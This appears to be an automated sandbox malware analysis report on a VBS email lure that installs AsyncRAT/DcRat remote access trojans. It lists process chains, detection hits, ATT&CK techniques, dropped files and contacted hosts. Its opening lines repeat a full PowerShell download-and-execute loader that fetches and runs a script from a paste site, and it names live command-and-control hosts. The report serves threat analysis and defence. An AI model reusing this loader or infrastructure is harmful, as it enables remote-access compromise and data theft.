Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"

Source: InstallUtil.exe, 0000000E.00000003.498514895.0000000005872000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910897890.00000000033B3000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Program Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected DcRat

Source: Yara match	File source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Remote Access Functionality

Yara detected DcRat

Source: Yara match	File source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	1 Scheduled Task/Job	412 Process Injection	221 Scripting	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	121 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	2 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	13 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	412 Process Injection	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Re-RFQ - PN List.vbs	3%	Virustotal		Browse
Re-RFQ - PN List.vbs	12%	ReversingLabs	Script-WScript.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	100%	Avira	TR/Dropper.Gen
C:\Users\Public\gia9ab2dg0.PS1	100%	Avira	DR/PShell.G2
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	100%	Avira	VBS/PSRunner.VPAY
C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.2.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.4.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
17.0.InstallUtil.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.3.unpack	100%	Avira	HEUR/AGEN.1202861	Download File
14.0.InstallUtil.exe.400000.2.unpack	100%	Avira	HEUR/AGEN.1202861	Download File

Domains

Source	Detection	Scanner	Label	Link
textbin.net	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://textbin.net/raw/gia9ab2dg0	4%	Virustotal		Browse
https://textbin.net/raw/gia9ab2dg0	0%	Avira URL Cloud	safe
https://textbin.net/raw/gia9ab2dg00y	0%	Avira URL Cloud	safe
https://textbin.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
textbin.net	148.72.177.212	true	true	4%, Virustotal, Browse	unknown
sky01.publicvm.com	91.193.75.216	true	false		high
SQL8003.site4now.net	199.102.48.248	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://textbin.net/raw/gia9ab2dg0	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
sky01.publicvm.com	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://textbin.net/raw/gia9ab2dg00y	powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	false		high
https://textbin.net	powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
148.72.177.212	textbin.net	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
91.193.75.216	sky01.publicvm.com	Serbia	209623	DAVID_CRAIGGG	false
199.102.48.248	SQL8003.site4now.net	United States	35937	ZCOLO-LAS01US	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	627719
Start date and time: 16/05/202219:28:00	2022-05-16 19:28:00 +02:00
Joe Sandbox Product:	CloudBasic
